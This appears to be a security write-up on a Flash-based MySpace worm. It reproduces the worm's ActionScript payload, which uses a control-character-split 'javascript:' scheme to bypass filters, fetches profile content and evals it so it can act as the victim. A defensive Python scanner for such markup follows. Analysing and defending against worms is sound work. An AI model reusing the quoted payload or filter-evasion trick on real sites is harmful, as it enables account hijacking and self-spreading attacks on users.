MySpace has been infected by a Flash-based (.swf) worm that is spreading rapidly through the site. It embeds JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec warned Monday. However, it may be just the tip of the iceberg. Let’s take a look at how it works, to understand how easily it could be modified to deliver far more devastating payloads.

The unnamed worm isn’t malicious, but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file. This could easily replicate the Samy is my friend worm without breaking a sweat.

This JavaScript code would then be interpreted by the browser of any user who visited the profile, allowing sensitive data to be stolen, such as the hash value required to carry out operations as that user, and allowing operations to be performed on behalf of that user (without consent, obviously). Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.

If the payload were malicious, it could carry out secondary attacks, such as targeting recently discovered vulnerabilities affecting Microsoft Office content. The impact would be much higher, exposing even sensitive information on your hard disk.

Let’s take a look at the worm, thanks to research by kinematic.theory:

When you visit an already infected page, there is a Flash object embedded (“redirect.swf”) which contains the ActionScript:
getURL("url");

It opens the specified blog URL and redirects you to it.

On this blog URL there is another Flash file embedded, “retrievecookie.swf”. It contains:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};" + "eval(sc);}};" + "x.send(null);", "");

It opens another blog post (link) and evaluates its contents.

This code gets your MySpace hash, which allows anyone to act as you on MySpace and perform any operation on your behalf, like changing your password or adding someone unknown as your friend: anything you can do on MySpace. Currently the code only adds a message to your MySpace profile. It uses AJAX extensively for its operations.
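Two things in the retrievecookie.swf payload above are worth checking for on the defending side: the scheme is written as "javas\n\rcript:" so that a filter looking for the literal string "javascript:" never matches, even though the browser strips tabs, newlines and carriage returns from a URL before it parses the scheme; and the whole chain starts from a small Flash object embedded in user-supplied profile HTML. The following is an added example (my own code, not the worm’s and not anything from MySpace or from kinematic.theory) of a scanner for user-submitted profile markup that normalises URL schemes the way a browser would before deciding whether they are script URLs, and that lists embedded .swf objects for review. The sample profile HTML, the example.invalid host and all function names are constructed for the example.

```python
"""Scan user-supplied profile HTML for script-scheme URLs and embedded Flash.

Added example; not code from the page, the worm, or MySpace.
"""
import re
from html.parser import HTMLParser

SCRIPT_SCHEMES = {"javascript", "vbscript"}

# The URL standard removes tab, LF and CR anywhere in a URL and any leading or
# trailing C0 control or space before parsing, so "javas\n\rcript:" becomes
# "javascript:" in the browser. A filter that compares the raw string misses
# it. Stripping every byte in 0x00-0x20 is deliberately stricter than the
# standard: a defensive filter should err towards catching more.
_CTRL = re.compile(r"[\x00-\x20]")


def normalize_scheme(url: str) -> str:
    """Return the lower-cased scheme a browser would see, or '' if there is none."""
    cleaned = _CTRL.sub("", url)
    head, sep, _rest = cleaned.partition(":")
    return head.lower() if sep else ""


def is_script_url(url: str) -> bool:
    """True if the URL would execute script when navigated to or loaded."""
    return normalize_scheme(url) in SCRIPT_SCHEMES


def is_swf_url(url: str) -> bool:
    """True if the URL points at a Shockwave Flash file (query string ignored)."""
    path = _CTRL.sub("", url).lower().split("?", 1)[0]
    return path.endswith(".swf")


class ProfileScanner(HTMLParser):
    """Collects script-scheme URLs and .swf references from any URL-bearing attribute."""

    # Attributes that carry URLs in ordinary profile markup; "value" covers
    # <param name="movie" value="...swf"> inside an <object>.
    URL_ATTRS = {"href", "src", "data", "value", "action"}

    def __init__(self):
        super().__init__()
        self.script_urls = []  # (tag, attribute, raw value)
        self.swf_urls = []     # (tag, attribute, raw value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name not in self.URL_ATTRS:
                continue
            if is_script_url(value):
                self.script_urls.append((tag, name, value))
            if is_swf_url(value):
                self.swf_urls.append((tag, name, value))


def scan_profile(html: str) -> dict:
    """Return the findings for one profile's HTML as a dict of two lists."""
    scanner = ProfileScanner()
    scanner.feed(html)
    scanner.close()
    return {"script_urls": scanner.script_urls, "swf_urls": scanner.swf_urls}


# Constructed sample profile: a harmless paragraph, a 1x1 embedded Flash
# object, a link whose scheme is split by CR/LF, and a normal link.
SAMPLE_PROFILE = (
    "<p>about me</p>"
    '<embed src="http://example.invalid/redirect.swf" width="1" height="1">'
    '<a href="javas\n\rcript:alert(1)">click</a>'
    '<a href="http://example.invalid/blog">my blog</a>'
)

if __name__ == "__main__":
    for kind, hits in scan_profile(SAMPLE_PROFILE).items():
        for tag, attr, value in hits:
            print(f"{kind}: <{tag} {attr}={value!r}>")
```

Running the module on the constructed sample reports the split-scheme link and the embedded redirect.swf while leaving the ordinary blog link alone. The important design choice is that the decision is made on the normalised scheme rather than on a blacklist of raw strings; a raw-string filter can always be bypassed by another arrangement of control characters, whereas normalising first reproduces what the browser will actually do.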